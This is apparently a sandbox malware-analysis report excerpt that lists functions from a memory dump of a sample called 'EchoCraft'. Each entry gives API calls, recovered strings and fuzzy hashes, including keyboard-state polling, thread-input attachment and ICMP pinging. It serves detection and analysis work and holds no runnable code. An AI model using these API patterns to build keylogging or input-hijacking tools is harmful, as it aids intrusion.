SHGetDesktopFolder.SHELL32(?), ref: 00AF83A4
CoCreateInstance.OLE32(00B20CCC,00000000,00000001,00B47E4C,?), ref: 00AF83F0
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AF8475
CoTaskMemFree.OLE32(?,?), ref: 00AF84CD
SHBrowseForFolderW.SHELL32(?), ref: 00AF8558
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AF857B
CoTaskMemFree.OLE32(00000000), ref: 00AF8582
CoTaskMemFree.OLE32(00000000), ref: 00AF85D7
CoUninitialize.OLE32 ref: 00AF85DD

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 79020c24e4ef546d902348f0ef264f127433b599faa21a6269d72d1a86ba138c
Instruction ID: cc5de366eab863e7138088fe4de32b86aed8199ddaf1d1c8dfb77e8d21874d1d
Opcode Fuzzy Hash: 79020c24e4ef546d902348f0ef264f127433b599faa21a6269d72d1a86ba138c
Instruction Fuzzy Hash: E2C11975A00119AFCB14DFA4C984DAEBBF9FF48304B148598F51A9B261DB34EE45CB90

Function 00B15AF9 Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B15BE0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B15BF1
CharNextW.USER32(00000158), ref: 00B15C20
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B15C61
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B15C77
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B15C88

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 51bb6ab1aac9549a39eed1c9463d9260d2252b83a8391855ef53575f8243aa82
Instruction ID: d90a9cb0f4ce4b12e65e1227efcfe1c1a93afdc00a605e25f938895a9d72097a
Opcode Fuzzy Hash: 51bb6ab1aac9549a39eed1c9463d9260d2252b83a8391855ef53575f8243aa82
Instruction Fuzzy Hash: 27616E71904209EBDF219F54CC88AFF7BF8EF49710F908199F925AB291CB749981DB60

Function 00AE02A7 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AE02CE
SafeArrayAllocData.OLEAUT32(?), ref: 00AE0327
VariantInit.OLEAUT32(?), ref: 00AE0339
SafeArrayAccessData.OLEAUT32(?,?), ref: 00AE0359
VariantCopy.OLEAUT32(?,?), ref: 00AE03AC
SafeArrayUnaccessData.OLEAUT32(?), ref: 00AE03C0
VariantClear.OLEAUT32(?), ref: 00AE03D5
SafeArrayDestroyData.OLEAUT32(?), ref: 00AE03E2
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AE03EB
VariantClear.OLEAUT32(?), ref: 00AE03FD
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AE0408

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9fcaddcfdf4dc1e66c17a94b2cf497f0197f5164853311777343873a02555454
Instruction ID: 5161d98fa57cce1fd1d7bf68703674c6b3d46ce278622552ed3bd736505e698c
Opcode Fuzzy Hash: 9fcaddcfdf4dc1e66c17a94b2cf497f0197f5164853311777343873a02555454
Instruction Fuzzy Hash: C6414075A002199FCB00DFA5D948DEEBBB9FF48344F008069E955AB361DB74E985CFA0

Function 00AEA492 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00AEA4BA
GetAsyncKeyState.USER32(000000A0), ref: 00AEA53B
GetKeyState.USER32(000000A0), ref: 00AEA556
GetAsyncKeyState.USER32(000000A1), ref: 00AEA570
GetKeyState.USER32(000000A1), ref: 00AEA585
GetAsyncKeyState.USER32(00000011), ref: 00AEA59D
GetKeyState.USER32(00000011), ref: 00AEA5AF
GetAsyncKeyState.USER32(00000012), ref: 00AEA5C7
GetKeyState.USER32(00000012), ref: 00AEA5D9
GetAsyncKeyState.USER32(0000005B), ref: 00AEA5F1
GetKeyState.USER32(0000005B), ref: 00AEA603

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f086abc05b453a1454a5f67135cb2f03376b188514fa1943054f12073ac71f61
Instruction ID: 951a3b4055d6c3dc551e9dad3f576e9e79817319299ebe99d058cb0f2965135d
Opcode Fuzzy Hash: f086abc05b453a1454a5f67135cb2f03376b188514fa1943054f12073ac71f61
Instruction Fuzzy Hash: 8B4183745047CA6DFF319B6588143B5BEA16B32344F48845AD5C64B1C2EBA4BDC8C773

Function 00B1A58E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A823E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A823F2

GetSystemMetrics.USER32(0000000F), ref: 00B1A5CF
GetSystemMetrics.USER32(0000000F), ref: 00B1A5EF
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B1A82C
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B1A84A
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B1A86B
ShowWindow.USER32(00000003,00000000), ref: 00B1A88A
InvalidateRect.USER32(?,00000000,00000001), ref: 00B1A8AF
DefDlgProcW.USER32(?,00000005,?,?), ref: 00B1A8D2

Strings

, xrefs: 00B1A7E0

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-3916222277
Opcode ID: 97553e8b1e01b1e42f2c5a8da63195c6a2c183c0e8854ecbf1a92d26d9858b4e
Instruction ID: e9dc4b87d6aef23ef63e863719ca41a1c3d37ca208f1785092b72afffe49d2cc
Opcode Fuzzy Hash: 97553e8b1e01b1e42f2c5a8da63195c6a2c183c0e8854ecbf1a92d26d9858b4e
Instruction Fuzzy Hash: C6B178356012159FDF14CF28C9857EA7BF2FF84711F5880A9EC499B295EB30AE81CB52

Function 00B00DA1 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B00E02
inet_addr.WSOCK32(?), ref: 00B00E62
gethostbyname.WSOCK32(?), ref: 00B00E6E
IcmpCreateFile.IPHLPAPI ref: 00B00E7C
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B00F0C
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B00F2B
IcmpCloseHandle.IPHLPAPI(?), ref: 00B00FFF
WSACleanup.WSOCK32 ref: 00B01005

Strings

Ping, xrefs: 00B00EBC

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 0ef2c7e43cfcef37bbf30df5ec016b20961f46cd0d2e3f704c5028df9e47f9fd
Instruction ID: 8df0effde8e0b2371ee4f3decc12ac032549ac5c9c19cf2bc11b5a6f449e7a66
Opcode Fuzzy Hash: 0ef2c7e43cfcef37bbf30df5ec016b20961f46cd0d2e3f704c5028df9e47f9fd
Instruction Fuzzy Hash: 5D917E31618242AFD720EF15C589F1ABFE0EF49318F1489A9F4699B6E2C730ED45CB91

Function 00B09445 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00B09465

Part of subcall function 00AE9670: _wcslen.LIBCMT ref: 00AE9693

_wcslen.LIBCMT ref: 00B094C0
_wcslen.LIBCMT ref: 00B0950E
_wcslen.LIBCMT ref: 00B0954E
_wcslen.LIBCMT ref: 00B095E0

Strings

cdecl, xrefs: 00B094BA, 00B094BF
winapi, xrefs: 00B09508, 00B0950D
stdcall, xrefs: 00B09548, 00B0954D
none, xrefs: 00B095D7, 00B095DC

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: a6ce2eb98edfa617e655d3ab09e087c6db406627f16982f9b6d9f3a968aa92b5
Instruction ID: dfe50340f20add1f7245e720ed0dc2eb7041d416e45cc02a559bc8826a939142
Opcode Fuzzy Hash: a6ce2eb98edfa617e655d3ab09e087c6db406627f16982f9b6d9f3a968aa92b5
Instruction Fuzzy Hash: 8D519431A041169BCF14DF69C9918BEBBE5FF65324B2042A9F866D72C2DB31DD41C790

Function 00AF8996 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00AF8A58
SystemTimeToFileTime.KERNEL32(?,?), ref: 00AF8A68
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AF8A74
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AF8B11
SetCurrentDirectoryW.KERNEL32(?), ref: 00AF8B25
SetCurrentDirectoryW.KERNEL32(?), ref: 00AF8B57
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AF8B8D
SetCurrentDirectoryW.KERNEL32(?), ref: 00AF8B96

Strings

*.*, xrefs: 00AF8B9C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: ecb3032480fd644c319c82f1da3165aaa50affa221a4537e9d1916caa439110e
Instruction ID: 81a8fc3c0aaab32f5bd803546f5e259475f3ea5e4f4db276b536627c310fbe4e
Opcode Fuzzy Hash: ecb3032480fd644c319c82f1da3165aaa50affa221a4537e9d1916caa439110e
Instruction Fuzzy Hash: E4616BB25043499FC710EF60C9849AEB3E8FF89310F04891EF99997251DB35E945CF92

Function 00AF3C9F Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AF3CE6

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00AF3D07

Strings

Incorrect parameters to object property !, xrefs: 00AF3DC2
Line %d (File "%s"):, xrefs: 00AF3D5A, 00AF3D73
"%s" (%d) : ==> %s:, xrefs: 00AF3E39
^ ERROR , xrefs: 00AF3DB5
Error: , xrefs: 00AF3DE8
"%s" (%d) : ==> %s:%s%s, xrefs: 00AF3E1B

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: b09899d3ff4912beb4992f231c055e51312f9a88b15fa6c683796bd9166ed972
Instruction ID: 5fe2863c34cef7afb68a04640677b2a2a864be92c6b9d25365b0d2f68198c2f3
Opcode Fuzzy Hash: b09899d3ff4912beb4992f231c055e51312f9a88b15fa6c683796bd9166ed972
Instruction Fuzzy Hash: AF51717290021AAACF14FBE0DE46EEEB7B8AF18300F104565F50572162EF756F58DB61

Function 00AF5CAA Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AF5CB7
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AF5D2D
GetLastError.KERNEL32 ref: 00AF5D37
SetErrorMode.KERNEL32(00000000,READY), ref: 00AF5DBE

Strings

UNKNOWN, xrefs: 00AF5D5B
INVALID, xrefs: 00AF5D70
NOTREADY, xrefs: 00AF5D62
READONLY, xrefs: 00AF5D69
READY, xrefs: 00AF5D77, 00AF5D7F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 15f89eb8a797c56fbec44235c76474dfa06cd4b25a01392ccfaf86b4767f2ac7
Instruction ID: 3a38642787ef83a32b83700ffd8f7b250a64d48140afe1eaaa2644f031ae49bd
Opcode Fuzzy Hash: 15f89eb8a797c56fbec44235c76474dfa06cd4b25a01392ccfaf86b4767f2ac7
Instruction Fuzzy Hash: BE316075E016099FDB10DFA8D988ABA7BB4EF05344F148069F605DB2A2DB31DD42CB91

Function 00B14320 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00B14353
SetMenu.USER32(?,00000000), ref: 00B14362
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B143EA
IsMenu.USER32(?), ref: 00B143FE
CreatePopupMenu.USER32 ref: 00B14408
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B14435
DrawMenuBar.USER32 ref: 00B1443D

Strings

0, xrefs: 00B1432E
F, xrefs: 00B14428

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: a61e639dd5dd0cf866739fbc4f82788fccd98c409d76222c9269b8371b8598f3
Instruction ID: b37b2238a4d516647503941481392291acddd2713ee46d10a641142a9a61dd74
Opcode Fuzzy Hash: a61e639dd5dd0cf866739fbc4f82788fccd98c409d76222c9269b8371b8598f3
Instruction Fuzzy Hash: DC4167B4A01209EFDF14CF64E894BEA7BB6FF5A314F544468E95597360CB30A950CF50

Function 00AE26DF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

Part of subcall function 00AE44BB: GetClassNameW.USER32(?,?,000000FF), ref: 00AE44DE

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00AE2764
GetDlgCtrlID.USER32 ref: 00AE276F
GetParent.USER32 ref: 00AE278B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AE278E
GetDlgCtrlID.USER32(?), ref: 00AE2797
GetParent.USER32(?), ref: 00AE27AB
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AE27AE

Strings

ListBox, xrefs: 00AE2721
ComboBox, xrefs: 00AE26EC

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 4c3c84b6f48c894c78c6070375815d73b6c83e72a6c37855568b4aa55b8b2b23
Instruction ID: ca6ba896b11ab95d3aabdbc7a94975ea406abe4ced5672cf5052d1e5a3a80bc7
Opcode Fuzzy Hash: 4c3c84b6f48c894c78c6070375815d73b6c83e72a6c37855568b4aa55b8b2b23
Instruction Fuzzy Hash: 7921C274E00218BBCF01AFA1CC85EEEBBB9EF05350F504156F961A32E2CA395808DB60

Function 00AE27C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

Part of subcall function 00AE44BB: GetClassNameW.USER32(?,?,000000FF), ref: 00AE44DE

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00AE2843
GetDlgCtrlID.USER32 ref: 00AE284E
GetParent.USER32 ref: 00AE286A
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AE286D
GetDlgCtrlID.USER32(?), ref: 00AE2876
GetParent.USER32(?), ref: 00AE288A
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AE288D

Strings

ListBox, xrefs: 00AE2802
ComboBox, xrefs: 00AE27CD

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 9ec863de2df8e0b990574b51be55df5a5860e0463f1f70548a2d30a479586397
Instruction ID: 256f9c9a4010d5ad39151edc57096cb21d2325a86259d90ee7d2c643bfa86ce8
Opcode Fuzzy Hash: 9ec863de2df8e0b990574b51be55df5a5860e0463f1f70548a2d30a479586397
Instruction Fuzzy Hash: C821A4B5E00214BBCF11ABA1CC85FEEBBB8EF09340F104456F99197196DB799914DB60

Function 00B140FD Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B14177
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B1417A
GetWindowLongW.USER32(?,000000F0), ref: 00B141A1
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B141C4
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B1423C
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00B14286
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00B142A1
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00B142BC
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00B142D0
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00B142ED

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 479177c4285a52ed3fce225fa437fcc09ccef61a349583621ade53065cf2222e
Instruction ID: 1046c8dfa4825ee0d0e83e4411711032d10b2a1a45ab3e386de63b58c481607c
Opcode Fuzzy Hash: 479177c4285a52ed3fce225fa437fcc09ccef61a349583621ade53065cf2222e
Instruction Fuzzy Hash: 1C616875900248AFDB10DFA8CD81EEE77F8EF09710F5001A9FA14A73A1DB74A985DB90

Function 00AEB953 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00AEB975
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AEAA05,?,00000001), ref: 00AEB989
GetWindowThreadProcessId.USER32(00000000), ref: 00AEB990
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AEAA05,?,00000001), ref: 00AEB99F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00AEB9B1
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00AEAA05,?,00000001), ref: 00AEB9CA
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AEAA05,?,00000001), ref: 00AEB9DC
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AEAA05,?,00000001), ref: 00AEBA21
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00AEAA05,?,00000001), ref: 00AEBA36
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00AEAA05,?,00000001), ref: 00AEBA41

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

